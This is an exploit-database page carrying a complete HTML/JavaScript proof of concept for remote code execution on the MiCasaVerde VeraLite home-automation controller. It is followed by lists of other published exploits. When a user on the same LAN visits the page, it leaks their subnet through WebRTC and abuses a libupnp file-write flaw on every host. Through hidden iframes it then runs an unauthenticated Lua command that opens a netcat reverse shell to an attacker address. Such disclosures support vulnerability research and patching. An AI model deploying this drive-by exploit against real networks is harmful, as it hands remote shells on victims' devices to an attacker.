Search for hundreds of thousands of exploits

"MiCasaVerde VeraLite - Remote Code Execution"

Author

Exploit author

"Jacob Baines"

Platform

Exploit platform

hardware

Release date

Exploit published date

2016-10-20

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
# Exploit Title: MiCasa VeraLite Remote Code Execution
# Date: 10-20-2016
# Software Link: http://getvera.com/controllers/veralite/
# Exploit Author: Jacob Baines
# Contact: https://twitter.com/Junior_Baines
# CVE: CVE-2013-4863 & CVE-2016-6255
# Platform: Hardware

1. Description

A remote attacker can execute code on the MiCasa VeraLite if someone on the same LAN as the VeraLite visits a crafted webpage.

2. Proof of Concept

<!--
    @about
    This file, when loaded in a browser, will attempt to get a reverse shell
    on a VeraLite device on the client's network. This is achieved with the
    following steps:

    1. Acquire the client's internal IP address using webrtc. We then assume the
       client is operating on a \24 network.
    2. POST :49451/z3n.html to every address on the subnet. This leverages two
       things we know to be true about VeraLite:
           - there should be a UPnP HTTP server on 49451
           - VeraLite uses a libupnp vulnerable to CVE-2016-6255.
    3. Attempt to load :49451/z3n.html in an iframe. This will exist if step 2
       successfully created the file via CVE-2016-6255
    4. z3n.html will allow us to bypass same origin policy and it will make a
       POST request that executes RunLau. This also leverages information we
       know to be true about Veralite:
           - the control URL for HomeAutomationGateway is /upnp/control/hag
           - no auth required
    5. Our RunLua code executes a reverse shell to 192.168.217:1270.

    @note
    This code doesn't run fast in Firefox. This appears to largely be a performance
    issue associated with attaching a lot of iframes to a page. Give the shell
    popping a couple of minutes. In Chrome, it runs pretty fast but might
    exhaust socket usage.

    @citations
    - WebRTC IP leak: https://github.com/diafygi/webrtc-ips
    - Orignal RunLua Disclosure: https://media.blackhat.com/us-13/US-13-Crowley-Home-Invasion-2-0-WP.pdf
    - CVE-2016-6255: http://seclists.org/oss-sec/2016/q3/102
-->
<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <script>
            /**
             * POSTS a page to ip:49451/z3n.html. If the target is a vulnerable
             * libupnp then the page will be written. Once the request has
             * completed, we attempt to load it in an iframe in order to bypass
             * same origin policy. If the page is loaded into the iframe then
             * it will make a soap action request with the action RunLua. The 
             * Lua code will execute a reverse shell.
             * @param ip the ip address to request to
             * @param frame_id the id of the iframe to create
             */
            function create_page(ip, frame_id)
            {
                payload = "<!DOCTYPE html>\n" +
                          "<html>\n" +
                            "<head>\n" +
                                "<title>Try To See It Once My Way</title>\n" +
                                "<script>\n" +
                                    "function exec_lua() {\n" +
                                        "soap_request = \"<s:Envelope s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\" xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\";\n" +
                                        "soap_request += \"<s:Body>\";\n" +
                                        "soap_request += \"<u:RunLua xmlns:u=\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1\\\">\";\n" +
                                        "soap_request += \"<Code>os.execute("/bin/sh -c &apos;(mkfifo /tmp/a; cat /tmp/a | /bin/sh -i 2>&1 | nc 192.168.1.217 1270 > /tmp/a)&&apos;")</Code>\";\n" +
                                        "soap_request += \"</u:RunLua>\";\n" +
                                        "soap_request += \"</s:Body>\";\n" +
                                        "soap_request += \"</s:Envelope>\";\n" +

                                        "xhttp = new XMLHttpRequest();\n" +
                                        "xhttp.open(\"POST\", \"upnp/control/hag\", true);\n" +
                                        "xhttp.setRequestHeader(\"MIME-Version\", \"1.0\");\n" +
                                        "xhttp.setRequestHeader(\"Content-type\", \"text/xml;charset=\\\"utf-8\\\"\");\n" +
                                        "xhttp.setRequestHeader(\"Soapaction\", \"\\\"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua\\\"\");\n" +
                                        "xhttp.send(soap_request);\n" +
                                    "}\n" +
                                "</scr\ipt>\n" +
                            "</head>\n" +
                            "<body onload=\"exec_lua()\">\n" +
                            "Zen?\n" +
                            "</body>\n" +
                          "</html>";

                var xhttp = new XMLHttpRequest();
                xhttp.open("POST", "http://" + ip  + ":49451/z3n.html", true);
                xhttp.timeout = 1000;
                xhttp.onreadystatechange = function()
                {
                    if (xhttp.readyState == XMLHttpRequest.DONE)
                    {
                        new_iframe = document.createElement('iframe');
                        new_iframe.setAttribute("src", "http://" + ip + ":49451/z3n.html");
                        new_iframe.setAttribute("id", frame_id);
                        new_iframe.setAttribute("style", "width:0; height:0; border:0; border:none");
                        document.body.appendChild(new_iframe);
                    }
                };
                xhttp.send(payload);
            }

            /**
             * This function abuses the webrtc internal IP leak. This function
             * will find the the upper three bytes of network address and simply
             * assume that the client is on a \24 network.
             *
             * Once we have an ip range, we will attempt to create a page on a
             * vulnerable libupnp server via create_page().
             */
            function spray_and_pray()
            {
                RTCPeerConnection = window.RTCPeerConnection ||
                                    window.mozRTCPeerConnection ||
                                    window.webkitRTCPeerConnection;

                peerConn = new RTCPeerConnection({iceServers:[]});
                noop = function() { };

                peerConn.createDataChannel("");
                peerConn.createOffer(peerConn.setLocalDescription.bind(peerConn), noop);
                peerConn.onicecandidate = function(ice)
                {
                    if (!ice || !ice.candidate || !ice.candidate.candidate)
                    {
                        return;
                    }

                    clientNetwork = /([0-9]{1,3}(\.[0-9]{1,3}){2})/.exec(ice.candidate.candidate)[1];
                    peerConn.onicecandidate = noop;

                    if (clientNetwork && clientNetwork.length > 0)
                    {
                        for (i = 0; i < 255; i++)
                        {
                            create_page(clientNetwork + '.' + i, "page"+i);
                        }
                    }
                };
            }
        </script>
    </head>
    <body onload="spray_and_pray()">
    Everything zen.
    </body>
</html>

3. Solution:

No solution exists
Release Date Title Type Platform Author
2020-10-23 "Lot Reservation Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'id' SQL Injection" webapps php "Ankita Pal"
2020-10-23 "Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-10-20 "Comtrend AR-5387un router - Persistent XSS (Authenticated)" webapps hardware OscarAkaElvis
2020-10-19 "HiSilicon Video Encoders - RCE via unauthenticated command injection" webapps hardware "Alexei Kojenov"
2020-10-19 "HiSilicon Video Encoders - Full admin access via backdoor password" webapps hardware "Alexei Kojenov"
2020-10-19 "HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware" webapps hardware "Alexei Kojenov"
2020-10-19 "HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal" webapps hardware "Alexei Kojenov"
2020-10-19 "HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)" webapps hardware "Alexei Kojenov"
2020-10-12 "Cisco ASA and FTD 9.6.4.42 - Path Traversal" webapps hardware 3ndG4me
2020-10-08 "D-Link DSR-250N 3.12 - Denial of Service (PoC)" webapps hardware "RedTeam Pentesting GmbH"
2020-10-06 "Karel IP Phone IP1211 Web Management Panel - Directory Traversal" webapps hardware "berat isler"
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
Release Date Title Type Platform Author
2020-04-17 "Cisco IP Phone 11.7 - Denial of service (PoC)" webapps hardware "Jacob Baines"
2020-04-08 "Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)" webapps hardware "Jacob Baines"
2020-03-31 "Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection" webapps hardware "Jacob Baines"
2020-03-31 "Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection" webapps hardware "Jacob Baines"
2020-03-24 "UCM6202 1.0.18.13 - Remote Command Injection" webapps hardware "Jacob Baines"
2019-10-31 "MikroTik RouterOS 6.45.6 - DNS Cache Poisoning" remote hardware "Jacob Baines"
2019-07-30 "Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming" webapps hardware "Jacob Baines"
2019-05-03 "Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection" webapps hardware "Jacob Baines"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-11 "Indusoft Web Studio 8.1 SP2 - Remote Code Execution" remote multiple "Jacob Baines"
2018-12-21 "Netatalk < 3.1.12 - Authentication Bypass" remote multiple "Jacob Baines"
2018-10-10 "MicroTik RouterOS < 6.43rc3 - Remote Root" remote hardware "Jacob Baines"
2018-09-18 "NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)" remote hardware "Jacob Baines"
2017-06-14 "HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution" remote hardware "Jacob Baines"
2016-10-20 "MiCasaVerde VeraLite - Remote Code Execution" remote hardware "Jacob Baines"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/40589/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.